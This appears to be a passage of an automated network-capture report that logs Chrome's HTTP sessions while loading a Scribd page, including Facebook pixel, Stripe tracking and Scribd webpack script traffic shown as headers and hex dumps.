                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:44 UTC1199OUTGET /signals/config/287045611447707?v=2.9.178&r=stable&domain=www.scribd.com&hme=28abfdc7e582ae2a8fdd6ac5ebb406923cf601dc2ee488049b0628e75e0f6b36&ex_m=70%2C122%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C173%2C176%2C188%2C184%2C185%2C187%2C29%2C101%2C53%2C77%2C186%2C168%2C171%2C181%2C182%2C189%2C132%2C41%2C191%2C192%2C34%2C144%2C15%2C50%2C197%2C196%2C134%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C169%2C172%2C141%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: connect.facebook.net
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:44 UTC1452INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        timing-allow-origin: *
                                                                                                                                                                                                                                                                                                                                                                                        reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                                                                                                                                                                        report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                                                                                                                                                                        content-security-policy: default-src 'self' data: blob: *;script-src 'nonce-j29pzEwP' *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* blob: data: 'self' https://*.google-analytics.com *.google.com;style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' https://*.google-analytics.com;img-src 'self' data: blob: * https://*.google-analytics.com;block-all-mixed-content;upgrade-insecure-requests;require-trusted-types-for 'script';
                                                                                                                                                                                                                                                                                                                                                                                        document-policy: force-load-at-top
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:44 UTC1670INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 63 61 6d 65 72 61 3d 28 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72 74 2d 68 65 69 67 68 74 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewpor
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:44 UTC1INData Raw: 2f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: /
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:44 UTC13818INData Raw: 2a 2a 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 37 2d 70 72 65 73 65 6e 74 2c 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 2a 0a 2a 20 59 6f 75 20 61 72 65 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 20 61 20 6e 6f 6e 2d 65 78 63 6c 75 73 69 76 65 2c 20 77 6f 72 6c 64 77 69 64 65 2c 20 72 6f 79 61 6c 74 79 2d 66 72 65 65 20 6c 69 63 65 6e 73 65 20 74 6f 20 75 73 65 2c 0a 2a 20 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 61 6e 64 20 64 69 73 74 72 69 62 75 74 65 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20 69 6e 20 73 6f 75 72 63 65 20 63 6f 64 65 20 6f 72 20 62 69 6e 61 72 79 20 66 6f 72 6d 20 66 6f 72 20 75 73 65 0a 2a 20 69 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 77 69 74
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: *** Copyright (c) 2017-present, Facebook, Inc. All rights reserved.** You are hereby granted a non-exclusive, worldwide, royalty-free license to use,* copy, modify, and distribute this software in source code or binary form for use* in connection wit
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:44 UTC16384INData Raw: 79 70 65 3a 22 40 40 70 72 6f 74 6f 74 79 70 65 22 29 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 61 7d 3b 66 75 6e 63 74 69 6f 6e 20 69 28 61 2c 62 29 7b 69 66 28 21 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 62 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 7d 66 75 6e 63 74 69 6f 6e 20 6a 28 61 2c 62 29 7b 69 66 28 21 61 29 74 68 72 6f 77 20 6e 65 77 20 52 65 66 65 72 65 6e 63 65 45 72 72 6f 72 28 22 74 68 69 73 20 68 61 73 6e 27 74 20 62 65 65 6e 20 69 6e 69 74 69 61 6c 69 73 65 64 20 2d 20 73 75 70 65 72 28 29 20 68 61 73 6e 27 74 20 62 65 65 6e 20 63 61 6c 6c 65 64 22 29 3b 72 65 74 75 72 6e 20 62 26 26 28 74 79 70 65
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ype:"@@prototype")?"symbol":typeof a};function i(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")}function j(a,b){if(!a)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return b&&(type
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC16384INData Raw: 28 22 5b 66 62 70 69 78 65 6c 5d 20 22 2b 64 2e 69 64 2b 22 20 69 73 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 20 47 6f 20 74 6f 20 45 76 65 6e 74 73 20 4d 61 6e 61 67 65 72 20 74 6f 20 6c 65 61 72 6e 20 6d 6f 72 65 22 29 29 7d 29 7d 29 7d 29 28 29 3b 72 65 74 75 72 6e 20 65 2e 65 78 70 6f 72 74 73 7d 28 61 2c 62 2c 63 2c 64 29 7d 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 70 72 6f 68 69 62 69 74 65 64 73 6f 75 72 63 65 73 22 29 3b 66 2e 72 65 67 69 73 74 65 72 50 6c 75 67 69 6e 26 26 66 2e 72 65 67 69 73 74 65 72 50 6c 75 67 69 6e 28 22 66 62 65 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 70 72 6f 68 69 62 69 74 65 64 73 6f 75 72
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ("[fbpixel] "+d.id+" is unavailable. Go to Events Manager to learn more"))})})})();return e.exports}(a,b,c,d)});e.exports=f.getFbeventsModules("SignalsFBEvents.plugins.prohibitedsources");f.registerPlugin&&f.registerPlugin("fbevents.plugins.prohibitedsour
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC16384INData Raw: 5d 7d 2c 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 3d 66 75 6e 63 74 69 6f 6e 28 62 2c 61 29 7b 66 2e 66 62 49 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 28 62 29 7c 7c 28 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 5b 62 5d 3d 61 29 7d 29 3b 0a 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 65 73 74 72 75 6c 65 65 6e 67 69 6e 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 67 2c 62 2c 63 2c 64 29 7b 76 61 72 20 65 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 65 2e 65 78 70 6f 72 74 73 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ]},f.ensureModuleRegistered=function(b,a){f.fbIsModuleLoaded(b)||(f.__fbeventsModules[b]=a)});f.ensureModuleRegistered("SignalsFBEvents.plugins.estruleengine",function(){return function(g,b,c,d){var e={exports:{}};e.exports;(function(){"use strict";var
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC2565INData Raw: 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 50 6c 75 67 69 6e 22 29 3b 76 61 72 20 64 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 50 61 72 61 6d 4c 69 73 74 22 29 2c 67 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 4c 6f 67 67 69 6e 67 22 29 2c 68 3d 67 2e 6c 6f 67 45 72 72 6f 72 2c 69 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 53 65 6e 64 45 76 65 6e 74 45 76 65 6e 74 22 29 2c 6a 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 73 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 53 65 6e 64 45 76 65 6e 74 22
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: FbeventsModules("SignalsFBEventsPlugin");var d=f.getFbeventsModules("SignalsParamList"),g=f.getFbeventsModules("SignalsFBEventsLogging"),h=g.logError,i=f.getFbeventsModules("SignalsFBEventsSendEventEvent"),j=f.getFbeventsModules("signalsFBEventsSendEvent"
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC14406INData Raw: 4d 6f 64 75 6c 65 73 5b 61 5d 28 29 29 3b 72 65 74 75 72 6e 20 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 5b 61 5d 7d 2c 66 2e 66 62 49 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 21 21 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 5b 61 5d 7d 2c 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 3d 66 75 6e 63 74 69 6f 6e 28 62 2c 61 29 7b 66 2e 66 62 49 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 28 62 29 7c 7c 28 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 5b 62 5d 3d 61 29 7d 29 3b 0a 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 2e 70 6c 75 67 69
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Modules[a]());return f.__fbeventsResolvedModules[a]},f.fbIsModuleLoaded=function(a){return!!f.__fbeventsModules[a]},f.ensureModuleRegistered=function(b,a){f.fbIsModuleLoaded(b)||(f.__fbeventsModules[b]=a)});f.ensureModuleRegistered("SignalsFBEvents.plugi


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        141192.168.2.164988135.164.166.2244436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:44 UTC606OUTPOST /6 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: m.stripe.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 3492
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Origin: https://m.stripe.network
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://m.stripe.network/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:44 UTC3492OUTData Raw: 4a 54 64 43 4a 54 49 79 64 6a 49 6c 4d 6a 49 6c 4d 30 45 78 4a 54 4a 44 4a 54 49 79 61 57 51 6c 4d 6a 49 6c 4d 30 45 6c 4d 6a 49 79 5a 44 6c 6d 4f 54 52 6d 4d 7a 55 34 59 6a 55 32 5a 57 45 30 5a 54 67 32 4d 7a 63 77 4f 44 45 34 59 6a 52 6d 4d 32 49 31 59 79 55 79 4d 69 55 79 51 79 55 79 4d 6e 51 6c 4d 6a 49 6c 4d 30 45 30 4f 54 41 75 4f 43 55 79 51 79 55 79 4d 6e 52 68 5a 79 55 79 4d 69 55 7a 51 53 55 79 4d 69 55 79 4e 47 35 77 62 56 39 77 59 57 4e 72 59 57 64 6c 58 33 5a 6c 63 6e 4e 70 62 32 34 6c 4d 6a 49 6c 4d 6b 4d 6c 4d 6a 4a 7a 63 6d 4d 6c 4d 6a 49 6c 4d 30 45 6c 4d 6a 4a 71 63 79 55 79 4d 69 55 79 51 79 55 79 4d 6d 45 6c 4d 6a 49 6c 4d 30 45 6c 4e 30 49 6c 4d 6a 4a 68 4a 54 49 79 4a 54 4e 42 4a 54 64 43 4a 54 49 79 64 69 55 79 4d 69 55 7a 51 53 55
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: JTdCJTIydjIlMjIlM0ExJTJDJTIyaWQlMjIlM0ElMjIyZDlmOTRmMzU4YjU2ZWE0ZTg2MzcwODE4YjRmM2I1YyUyMiUyQyUyMnQlMjIlM0E0OTAuOCUyQyUyMnRhZyUyMiUzQSUyMiUyNG5wbV9wYWNrYWdlX3ZlcnNpb24lMjIlMkMlMjJzcmMlMjIlM0ElMjJqcyUyMiUyQyUyMmElMjIlM0ElN0IlMjJhJTIyJTNBJTdCJTIydiUyMiUzQSU
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:44 UTC872INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        set-cookie: m=4cfeb51b-755d-40fb-be12-ca2bf6a8f0c603c5ba;Expires=Sun, 06-Dec-2026 21:59:44 GMT;Secure;HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                        x-stripe-inbound-proxy-type: envoy
                                                                                                                                                                                                                                                                                                                                                                                        x-stripe-server-envoy-start-time-us: 1733522384705488
                                                                                                                                                                                                                                                                                                                                                                                        x-stripe-server-envoy-upstream-service-time-ms: 4
                                                                                                                                                                                                                                                                                                                                                                                        x-envoy-attempt-count: 1
                                                                                                                                                                                                                                                                                                                                                                                        x-stripe-bg-intended-route-color: blue
                                                                                                                                                                                                                                                                                                                                                                                        x-stripe-outbound-proxy-type: envoy
                                                                                                                                                                                                                                                                                                                                                                                        x-stripe-client-envoy-start-time-us: 1733522384705271
                                                                                                                                                                                                                                                                                                                                                                                        x-stripe-upstream-host: 10.72.64.213:1643
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://m.stripe.network
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: Content-Type
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31556926; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/json;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:44 UTC156INData Raw: 7b 22 6d 75 69 64 22 3a 22 37 62 64 62 66 64 36 37 2d 63 62 33 66 2d 34 35 64 63 2d 61 36 62 63 2d 37 32 35 35 61 66 35 64 64 64 37 65 36 63 32 31 66 31 22 2c 22 67 75 69 64 22 3a 22 34 63 66 65 62 35 31 62 2d 37 35 35 64 2d 34 30 66 62 2d 62 65 31 32 2d 63 61 32 62 66 36 61 38 66 30 63 36 30 33 63 35 62 61 22 2c 22 73 69 64 22 3a 22 63 34 37 30 66 38 64 38 2d 38 36 33 38 2d 34 38 38 30 2d 38 39 36 33 2d 32 34 65 30 63 34 35 36 33 66 34 65 61 33 38 62 33 62 22 7d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: {"muid":"7bdbfd67-cb3f-45dc-a6bc-7255af5ddd7e6c21f1","guid":"4cfeb51b-755d-40fb-be12-ca2bf6a8f0c603c5ba","sid":"c470f8d8-8638-4880-8963-24e0c4563f4ea38b3b"}


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        142192.168.2.1649888151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:44 UTC698OUTGET /webpack/doc_page/594.df1383.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: s-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                                        Purpose: prefetch
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC582INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 436968
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 26 Nov 2024 19:32:01 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: "41bdcb0e90d067e7c07d83ea0ba718e8"
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-meta-surrogate-key: monolith
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/javascript
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Age: 708832
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:45 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-ewr-kewr1740064-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522385.180962,VS0,VE1
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC16384INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 63 72 69 62 64 5f 61 70 70 5f 64 6f 63 70 61 67 65 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 63 72 69 62 64 5f 61 70 70 5f 64 6f 63 70 61 67 65 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 39 34 5d 2c 7b 33 37 35 39 34 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 68 38 3a 28 29 3d 3e 4b 73 2c 72 79 3a 28 29 3d 3e 6e 75 2c 75 56 3a 28 29 3d 3e 6b 64 2c 79 41 3a 28 29 3d 3e 46 64 2c 79 71 3a 28 29 3d 3e 47 64 2c 49 75 3a 28 29 3d 3e 47 61 2c 5f 35 3a 28 29 3d 3e 55 61 2c 4f 41 3a 28 29 3d 3e 46 61 7d 29 3b 76 61 72 20 72 3d 6e 28 33 38 35 34 34 29 2c 61 3d 6e 28 33 38 39 37 39 29 2c 69 3d 6e 28 34 30 38 38 30 29 2c 6f 3d 6e 28 33 39 30
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: (self.webpackChunk_scribd_app_docpage=self.webpackChunk_scribd_app_docpage||[]).push([[594],{37594:(e,t,n)=>{"use strict";n.d(t,{h8:()=>Ks,ry:()=>nu,uV:()=>kd,yA:()=>Fd,yq:()=>Gd,Iu:()=>Ga,_5:()=>Ua,OA:()=>Fa});var r=n(38544),a=n(38979),i=n(40880),o=n(390
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC16384INData Raw: 78 74 43 61 6c 6c 62 61 63 6b 26 26 28 74 68 69 73 2e 6e 65 78 74 43 61 6c 6c 62 61 63 6b 2e 63 61 6e 63 65 6c 28 29 2c 74 68 69 73 2e 6e 65 78 74 43 61 6c 6c 62 61 63 6b 3d 6e 75 6c 6c 29 7d 2c 61 2e 73 61 66 65 53 65 74 53 74 61 74 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 3d 74 68 69 73 2e 73 65 74 4e 65 78 74 43 61 6c 6c 62 61 63 6b 28 74 29 2c 74 68 69 73 2e 73 65 74 53 74 61 74 65 28 65 2c 74 29 7d 2c 61 2e 73 65 74 4e 65 78 74 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2c 6e 3d 21 30 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 6e 65 78 74 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 6e 26 26 28 6e 3d 21 31 2c 74 2e 6e 65 78 74 43 61 6c 6c 62 61 63 6b 3d 6e 75 6c 6c 2c 65 28 72
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: xtCallback&&(this.nextCallback.cancel(),this.nextCallback=null)},a.safeSetState=function(e,t){t=this.setNextCallback(t),this.setState(e,t)},a.setNextCallback=function(e){var t=this,n=!0;return this.nextCallback=function(r){n&&(n=!1,t.nextCallback=null,e(r
